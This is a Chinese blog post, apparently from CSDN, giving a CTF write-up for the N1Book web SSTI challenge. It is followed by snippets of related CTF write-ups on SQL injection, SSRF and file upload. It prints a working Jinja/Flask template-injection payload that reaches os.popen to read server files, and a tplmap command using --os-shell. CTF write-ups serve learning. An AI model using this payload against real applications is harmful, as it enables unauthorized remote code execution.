N1Book——web题

最新推荐文章于 2023-02-06 17:56:46 发布
最新推荐文章于 2023-02-06 17:56:46 发布
阅读量1k 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: python 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31710331/article/details/120370559
版权

一、SSTI

参考链接:CTF|有关SSTI的一切小秘密【Flask SSTI+姿势集+Tplmap大杀器】 - 知乎 (zhihu.com)

先尝试:

发现存在python模板注入,注意不要使用+,网页会出错

根据参考链接,找到 含有 os执行的类,

 然后通过 ls , cat 等命令,找到flag,一般在server里

 构造payload如下:

?password={{''.__class__.__mro__[1].__subclasses__()[127].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat app/server.py").read()')}}

 使用自动化工具:tplmap

python2 tplmap.py -u http://b9810ff4-d735-400d-b3fe-da796a69d63a.node4.buuoj.cn:81/?password=

发现存在注入: 使用 --os-shell 反弹shell

 

 

 

Wkingxc
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
N1BOOK】[第一章 web入门] wp
{OvEr}的博客
11-25 4120
N1BOOK】[第一章 web入门]常见的搜集 wp 打开页面就是这样的 我们用扫一下目录得到这三个返回正常robots.txt index.php~ .index.php.swp 扫目录工具dirsearch/御剑,这里我用的是dirsearch。 我们一个个访问一下, 他说flag在/flag1_is_her3_fun.txt,那我们就访问一下 得到第一半flag,继续访问 index.php~ 得到第2半flag,继续访问 .index.php.swp,打开文件 发现第3半flag ..
n1 2017.12真.pdf
08-19
2017年12月N1 2
BUU N1BOOK WEB
DoubleLiii的博客
02-06 139
平时做记录N1BOOK上面的web
【BUUCTF】N1BOOK WEB WP
aoao331198的博客
03-29 2212
文章目录常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2 常见的搜集 粗心的小李 git泄露,用scrabble工具得到一个网页打开即可 SQL注入-1 SQL注入-2 afr_1 afr_2
第三章 web进阶n1book
qq_51558360的博客
03-07 688
[第三章 web进阶]Python里的SSRF 直接按照提示来: 127.0.0.1是被禁止的 用0.0.0.0代替127.0.0.1就是成功了, 127.0.0.1是本机的环回地址,0.0.0.0代表本机上任何IP地址,因此可以利用0.0.0.0来绕过127.0.0.1的过滤。 本有多重解法 - `0.0.0.0:8000` 绕过 - `[::1]:8000` 绕过(需要支持 ipv6) - 重定向跳转到 `127.0.0.1:8000` - dns rebinding 输入一个域名,第
N1Book [第一章 web入门]-sql注入
m0_61368098的博客
08-20 743
重要的数据库:   information_schema   包含MySQL中所有的数据库信息 重要的表:   schemata   mysql中所有数据库的信息   schema_name  所有数据库名   tables   数据库表中的信息   table_schema 记录数据库名    table_name  记录数据表名 columns   列信息 column_name  字段名
2021 N1CTF CTF 真.zip
12-07
2021 N1CTF CTF 真
N1叉车司机考试练习100.docx
04-07
N1叉车司机考试练习100
2012年12月N1
09-19
2012年12月N1
磊科智能路由N1——PC端具体配置教程
10-01
2017年磊科发布了第一款智能路由N1,这款智能路由器N1在硬件及软件规格方面均有提升,那么磊科路由N1该怎么配置呢?下面就为大家分享下磊科智能路由N1配置具体步骤,大家参考下
N1BOOK第六关摸鱼:[第一章 web入门]SQL注入-2
weixin_45571987的博客
12-04 3891
BUUCTF:[第一章 web入门]SQL注入-2打开目,寻找解线索开始解得到回显开始注入目原理 打开目,寻找解线索   直接打开链接页面如下,我们按提示分别访问/login.php 和 /user.php 去看看   进入页面后习惯性地查看源代码发现有一行注释提示,告诉我们:可以在url后加入?tips=1 开启mysql错误提示,使用burp发包就可以看到啦   另一个页面则就只有一行 login first 开始解 得到回显   此时我们打开burp进行抓包(没有安装burp的兄
N1BOOK详解
shinygod的博客
10-06 1314
然后上传,访问/zzz.php.zzz就可以了,这样就解析成php了,因为apache是从右到左解析的,遇到不认识的后缀就忽略,继续往前解析,但这个漏洞有版本限制。用户名为admin时,显示账号或密码错误,但用户名不是admin时,显示账号不存在,所以用户名是admin。但是第三步一直成功不了,就尝试用nc直接下载也没成功,不清楚是怎么回事,望大佬告之!两种方式,一种布尔盲注,一种报错注入,也有可能有第三种,user.php没用到。,然后压缩,再用010打开,选择并双击一个start不为0h的。
N1Book-第二章Web进阶-Web文件上传漏洞
weixin_40872714的博客
03-31 4414
N1Book-第二章Web进阶-Web文件上传漏洞 以下内容转自 https://www.icode9.com/content-4-874265.html <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 //会包含文件pclzip.lib.php,感觉这个php里面是有一些针对zip包进行解压等的操作的 require_once('pclzip.lib.php'); //要是没上传文件,就输出
链接注入解决方法_N1Book WebSQL注入
weixin_39894778的博客
12-09 651
0X00 说明距离上次的笔记隔了很长时间,这段时间在准备一个比赛和一门课的期末考试,其实书上的知识点早就看完了,一直没什么时间整理,因此拖到现在,下次的笔记可能还要拖了,又要准备下一周的考试了。本期的笔记就是在网页经常存在的SQL注入的基础知识点和注入的办法,其实书上讲的很详细还有注入点的位置,我这就没有写出来。0X01 笔记一、SQL注入基础1.数字型注入一般都是通过HTTP的GET方...
CTF-N1BOOK (web入门)
weixin_51460355的博客
04-22 668
CTF-N1BOOK (web入门) 打开网页 明显是用.git脚本备份文件去还原源文件,所以用python2(注意:只能用python2)运行Githack.py并传入对应的参数(网址),即可获取该备份的源文件。 注意必须在当前目录下打开Githack.py 打开后输入对应的参数(网站),就可以得到一个html文件,从而获得源代码。 注意: python2和python3的同时安装,除了安装对应的exe以及修改环境变量外,还有使两个pip包管理工具能同时使用: ...
《从0到1:CTFer成长之路》 配套Web WP
热门推荐
feng的博客
10-05 1万+
前言 自己刚学了CTF两个月,深感入门CTF的困难。非常感谢Nu1L战队可以编写这本一本非常详实而且全面的CTF书籍,为许许多多像我这样的弱鸡提供了入门的帮助。 自己是Web方向,虽然学了两个月,但是并不是很系统的对Web进行学习。非要给个定位的话,自己现在顶多算是0.2,距离这本书的从0到1还有很大的差距。因此为了提高自己,真正的成为1,自己买了这本书而且要努力的进行学习。 这本书的配套目可以说给了自己学习知识的同时进行实践的机会。本来不想写WP的,因为考虑到Nu1L的微信公众号已经给出了WP。不过自己
CTF刷记录Buuctf_N1BOOK——afr_3
m_de_g的博客
06-17 1692
** N1BOOK——afr_3 ** 一、解思路 1.打开目发现一个输入框 既然是web的话,还是先查看页面源代码 就发现使用的是POST的提交方式,没办法,只能看这个框的秘密所在了 2.直接输入1进行查询 页面提示说,你为什么不看我们的文章呢?这里是个出发的按钮,点击 3.又有提示说明,这是一篇示例文章?内心充满了困惑?????? 抬头一看,URL好奇怪 http://80a3f61d-704d-4c38-b615-158bab104673.node3.buuoj.cn/article?
Buuctf N1BOOK [第二章 web进阶]文件上传
m_de_g的博客
08-17 2623
Buuctf [第二章 web进阶]文件上传 打开目,发现源代码泄露,初步判断为条件竞争 <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 require_once('pclzip.lib.php'); if(!$_FILES){ echo ' <!DOCTYPE html> <html lang="zh"> <head> <
N1BOOK
m2a3181的博客
07-17 400
N1BOOK [第一章 web入门]常见的搜集: dirsearch或者扫描一下,扫描出几个文件。dirsearch扫描命令: ./dirsearch -u 网址 -e * 扫出来结果为: 访问robots.txt得到目的网址 继续访问,得到一部分flag 访问index.php~,得到一部分flag 访问/.index.php.swp,把该文件下载下来 在kali种使用命令 vim r 文件名 进行恢复 发现第三部分flag ...
buuctf n1book
最新发布
08-23
根据引用、和的信息,buuctf n1book是一个与CTF(Capture The Flag)竞赛相关的主或者密码。在引用中提到了一个关于SQL注入的话,引用中提到了关于AES加密和解密的信息,而引用中提到了一个关于佛莱格的密码。根据这些信息,buuctf n1book可能是一个CTF竞赛中使用的密码或者解密信息的关键词。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [BUUCTF笔记之N1BOOK](https://blog.csdn.net/shuaicenglou3032/article/details/117934550)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值